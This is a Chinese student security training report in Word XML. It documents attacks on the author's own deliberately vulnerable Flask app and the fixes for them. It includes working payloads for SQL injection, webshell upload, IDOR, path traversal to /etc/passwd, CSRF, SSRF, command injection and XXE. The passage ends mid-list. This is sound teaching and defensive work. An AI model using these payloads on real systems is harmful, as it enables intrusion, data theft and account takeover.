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网络安全实训报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Simple User Management Platform</w:t>
        <w:br/>
        <w:t>Web 安全漏洞挖掘与修复实践</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实训项目：Simple User Management Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实训周期：2026 年 7 月 6 日 — 7 月 10 日、7 月 13 日 — 7 月 17 日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>技术栈：Python Flask / SQLite / HTML/CSS / Git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>测试工具：Burp Suite / curl / 浏览器开发者工具 / unittest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spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>1  实训概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>2  实训环境与技术栈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>3  实训内容与成果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.1  基础认证与配置安全审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.2  SQL 注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.3  任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.4  IDOR 越权与充值逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.5  LFI 路径遍历漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.6  CSRF 跨站请求伪造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.7  SSRF 服务端请求伪造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.8  命令注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.9  XXE 外部实体注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.10 安全加固与版本演进</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>4  漏洞矩阵总览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>5  修复成果统计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t>6  实训总结与收获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>1  实训概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实训以本人设计开发的 Simple User Management Platform 为靶标项目，围绕常见的 Web 安全漏洞类型展开系统性实践。项目采用 Python Flask 框架构建，功能涵盖用户登录注册、信息查询、个人资料管理、充值、头像上传、URL 抓取、Ping 网络诊断和 XML 数据导入等真实业务场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训方法论遵循"构建漏洞场景 → 复现攻击 → 分析根因 → 实施修复 → 回归验证"的完整闭环。每个专项均保留 Git 提交历史作为过程证据，依次为 feat（构建漏洞场景）、docs（撰写检测报告）、fix（完成安全加固）。两个分支（vulnerable 和 main）分别保存漏洞版本和修复版本，便于对比学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>实训目标：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 理解 OWASP Top 10 中常见 Web 漏洞的产生原理与利用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 掌握使用 Burp Suite、curl 等工具进行安全测试的方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 学会从代码层面分析漏洞根因并实施有效修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 建立安全开发生命周期（SSDLC）的工程化思维</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 培养撰写规范化安全报告的技术文档能力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>2  实训环境与技术栈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>2.1  硬件与操作系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>操作系统：Windows 10 / Kali Linux 2025.3（双平台测试）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CPU：Intel x86_64 架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>2.2  开发与测试工具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工具/组件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后端开发语言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框架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关系型数据库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Jinja2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模板引擎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Burp Suite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拦截与重放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命令行 HTTP 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版本控制与证据保留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自动化回归测试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报告文档生成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A1A2E"/>
        </w:rPr>
        <w:t>2.3  项目架构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安全关注点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表示层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Jinja2 模板、HTML/CSS 表单与结果展示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输入输出编码、敏感信息回显、CSRF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登录、注册、搜索、资料、充值、上传等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身份认证、对象级授权、命令解析器边界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字典与 SQLite users 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密码保护、SQL 参数化、数据源一致性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运维配置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环境变量、Session、Debug、Cookie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密钥管理、最小暴露、依赖治理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3  实训内容与成果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.1  基础认证与配置安全审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实训首先对平台的基础认证机制和启动配置进行安全审计。包括登录认证绕过、Session 安全配置、调试模式暴露、CSRF 防护缺失等问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>主要发现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 密码明文存储（USERS 字典中直接存储 admin123、alice2025）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 密钥硬编码（secret_key = "dev-key-2025"）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• Debug 模式默认开启，暴露 Werkzeug 调试器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• Session Cookie 无 SameSite、Secure 属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 登录页面 HTML 注释泄露默认凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 使用 werkzeug.security.generate_password_hash 进行密码哈希</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• secret_key 从环境变量获取，运行时随机生成 fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• Debug 模式由环境变量 DEBUG 控制，默认关闭</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 配置 SESSION_COOKIE_HTTPONLY、SameSite=Lax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 移除硬编码凭据的 HTML 注释</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.2  SQL 注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>登录、注册和搜索三个接口均使用 f-string 拼接 SQL 语句，未做任何输入过滤或参数化处理。攻击者可通过注入恶意 SQL 绕过认证、脱取数据库、插入后门数据。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UNION 注入脱取全量用户凭据</w:t>
        <w:br/>
        <w:t>GET /search?keyword=' UNION SELECT id,username,password,email,phone FROM users --</w:t>
        <w:br/>
        <w:t># 返回: admin/admin123, alice/alice2025 等明文密码</w:t>
        <w:br/>
        <w:br/>
        <w:t># 布尔盲注逐字提取密码</w:t>
        <w:br/>
        <w:t>GET /search?keyword=admin' AND (SELECT unicode(substr(password,1,1)) FROM users</w:t>
        <w:br/>
        <w:t xml:space="preserve">     WHERE username='admin')=97 --</w:t>
        <w:br/>
        <w:t># 条件为真时显示admin，为假时显示[无搜索结果]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 使用 SQLite 参数化查询（? 占位符）替代 f-string 拼接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 搜索接口 SELECT 语句不返回 password 字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.3  任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>头像上传功能未对文件类型做任何校验，允许上传任意文件到 static/uploads/ 目录，且使用用户提供的原始文件名保存，存在文件覆盖风险。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上传 PHP webshell</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -F "avatar=@shell.php" http://target.com/upload</w:t>
        <w:br/>
        <w:t># 上传 .htaccess</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -F "avatar=@.htaccess;filename=.htaccess" http://target.com/upload</w:t>
        <w:br/>
        <w:t># ✅ 全部上传成功，文件可公开访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 图片扩展名白名单（png/jpg/jpeg/gif/webp）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• UUID 重命名，防止覆盖和可预测文件名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• imghdr 验证文件内容是否为有效图片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 上传目录移至 static/ 外部，通过认证路由提供访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 将 MAX_CONTENT_LENGTH 从 16MB 降至 2MB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.4  IDOR 越权与充值逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>个人中心接口 /profile 和充值接口 /recharge 均通过 URL/表单参数指定目标用户，未验证当前登录用户与操作目标的一致性，导致任意用户可越权查看他人资料或修改他人余额。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alice 查看 admin 资料</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt "http://target.com/profile?user_id=1"</w:t>
        <w:br/>
        <w:t># ✅ 返回 admin 完整信息（邮箱、手机、余额）</w:t>
        <w:br/>
        <w:br/>
        <w:t># alice 为 admin 充值 500 元</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "user_id=1&amp;amount=500" http://target.com/recharge</w:t>
        <w:br/>
        <w:t># ✅ admin 余额从 99999 → 100499</w:t>
        <w:br/>
        <w:br/>
        <w:t># 负金额扣款</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "user_id=2&amp;amount=-1000" http://target.com/recharge</w:t>
        <w:br/>
        <w:t># ✅ alice 余额从 100 → -900 (透支)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• profile 接口校验当前用户 ID 与请求的 user_id 一致</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• recharge 接口仅允许给自己充值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 金额必须大于 0，单次充值上限 100,000 元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 余额上限 999,999 元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.5  LFI 路径遍历漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>动态页面加载功能 /page 直接拼接用户输入的 name 参数到文件路径，未对 ../ 路径穿越符做任何过滤。攻击者可读取服务器任意文件。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GET /page?name=../app.py</w:t>
        <w:br/>
        <w:t># ✅ 返回 app.py 源代码</w:t>
        <w:br/>
        <w:t>GET /page?name=../../etc/passwd</w:t>
        <w:br/>
        <w:t># ✅ 返回系统用户列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 路径规范化（os.path.abspath + os.path.realpath）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 限定文件只能从 pages/ 目录读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.6  CSRF 跨站请求伪造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有 POST 接口均未实施 CSRF 防护，攻击者可构造恶意页面，当已登录用户访问时自动提交恶意请求。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跨站修改密码（从任意 Origin）</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "username=admin&amp;new_password=hacked123" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Origin: https://evil.com" http://target.com/change-password</w:t>
        <w:br/>
        <w:t># ✅ admin 密码被修改为 hacked123</w:t>
        <w:br/>
        <w:br/>
        <w:t># 跨站充值</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "user_id=2&amp;amount=99999" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Origin: https://evil.net" http://target.com/recharge</w:t>
        <w:br/>
        <w:t># ✅ 充值成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 集成 flask-wtf CSRFProtect，所有表单添加 Token 校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 设置 SESSION_COOKIE_SAMESITE = "Lax"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 修改密码等敏感操作要求验证原密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.7  SSRF 服务端请求伪造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>URL 抓取功能未限制 URL 协议和目标 IP，支持 file://、dict:// 等协议，可访问 127.0.0.1 和 10.x.x.x 内网地址。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读取本地文件</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "url=file:///etc/passwd" http://target.com/fetch-url</w:t>
        <w:br/>
        <w:t># ✅ 返回 /etc/passwd 文件内容</w:t>
        <w:br/>
        <w:br/>
        <w:t># SSRF 访问内网服务</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -d "url=http://127.0.0.1:5000/admin" http://target.com/fetch-url</w:t>
        <w:br/>
        <w:t># ✅ 成功访问本机 5000 端口的内部功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• URL 协议白名单（仅允许 http/https）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 阻止内网地址（127.0.0.1、10.x.x.x、172.16.x.x、192.168.x.x）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 限制返回内容大小，避免内存耗尽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.8  命令注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ping 网络诊断功能使用 f-string 拼接系统命令并设置 shell=True，攻击者可通过分号、管道符、逻辑运算符注入任意系统命令。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分号注入执行系统命令</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt --data-urlencode "ip=127.0.0.1; id" http://target.com/ping</w:t>
        <w:br/>
        <w:t># ✅ 返回: uid=0(root) gid=0(root)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 管道符注入</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt --data-urlencode "ip=127.0.0.1 | whoami" http://target.com/ping</w:t>
        <w:br/>
        <w:t># ✅ 返回: root</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读取文件</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt --data-urlencode "ip=127.0.0.1; cat /etc/passwd" http://target.com/ping</w:t>
        <w:br/>
        <w:t># ✅ 返回系统用户列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 禁用 shell=True，使用参数数组形式执行命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• IP 地址白名单校验（ipaddress.ip_address()）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 正则限制仅允许数字和点号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.9  XXE 外部实体注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XML 数据导入功能通过正则提取 &lt;!ENTITY 定义中的 SYSTEM 路径后直接 open() 读取文件，不做任何路径校验。XML 解析器默认允许外部实体解析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击验证：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># XXE 文件读取</w:t>
        <w:br/>
        <w:t>xml_data='&lt;?xml version="1.0"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/hostname"&gt;]&gt;</w:t>
        <w:br/>
        <w:t>&lt;root&gt;&lt;user&gt;&lt;name&gt;&amp;xxe;&lt;/name&gt;&lt;/user&gt;&lt;/root&gt;'</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt --data-urlencode "xml_data=$xml_data" http://target.com/xml-import</w:t>
        <w:br/>
        <w:t># ✅ 返回主机名</w:t>
        <w:br/>
        <w:br/>
        <w:t># SSRF 型 XXE 扫描内网</w:t>
        <w:br/>
        <w:t>&lt;!ENTITY xxe SYSTEM "http://127.0.0.1:5000/"&gt;</w:t>
        <w:br/>
        <w:t># ✅ 返回内网 Web 页面内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 使用 defusedxml 替代 xml.etree.ElementTree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 禁用 DTD / 外部实体解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 限制实体扩展次数防 Billion Laughs 攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>3.10  安全加固与版本演进</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有安全修复通过 Git 分支管理进行版本演进。vulnerable 分支保留全部漏洞场景用于教学演示，main 分支逐步累积安全加固。Git 提交历史清晰记录每次功能迭代和修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>main 分支版本演进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提交信息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存在SQL注入漏洞的原始版本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漏洞构建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安全加固版（修复全部SQL注入等漏洞）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修复Sql注入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文件上传安全加固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修复文件上传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个人中心与充值功能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越权漏洞与业务逻辑安全加固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修复IDOR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动态页面加载功能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密码修改功能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抓取功能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Ping 网络诊断功能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XML 数据导入功能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新增功能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  漏洞矩阵总览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>下表汇总本次实训发现并修复的全部漏洞：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专项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漏洞入口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CVSS 评级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主要影响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核心修复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认证与配置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/login、Session、启动配置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严重/高危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认证绕过、凭据泄露、调试暴露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随机密钥、密码哈希、限速、CSRF、安全头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SQL 注入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/register、/search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9.8 严重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绕过认证、全库数据泄露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SQLite 参数化查询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任意文件上传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/upload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9.8 严重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持久化脚本、文件覆盖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类型校验、UUID 重命名、目录约束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IDOR 与充值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/profile、/recharge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高危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读取他人资料、修改他人余额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对象归属校验、金额边界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LFI/路径遍历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/page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8.1 高危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读取源码、配置、用户数据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路径规范化、限定根目录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CSRF 与越权改密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/change-password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8.8 高危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跨站改密、账户接管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CSRF Token、目标绑定当前会话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SSRF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/fetch-url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高危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内网访问、文件读取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协议白名单、私网拦截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命令注入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/ping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9.0 严重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执行系统命令、控制主机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参数数组、shell=False、IP 校验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XXE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/xml-import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8.6 高危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任意文件读取、二次攻击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禁用 DTD、安全 XML 解析器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5  修复成果统计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实训天数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 天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漏洞专项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9 类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Git 提交次数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20+ 次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漏洞检测报告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7 份（3 份 MD + 4 份 DOCX）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总代码行数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2000+ 行 Python/HTML/CSS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漏洞修复率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100%（所有发现漏洞均已修复）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GitHub 分支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main（修复版）/ vulnerable（漏洞版）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主要修复措施统计：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 参数化查询替代 f-string：3 处（login/register/search）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 密码哈希存储：2 处（USERS 字典 + SQLite）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
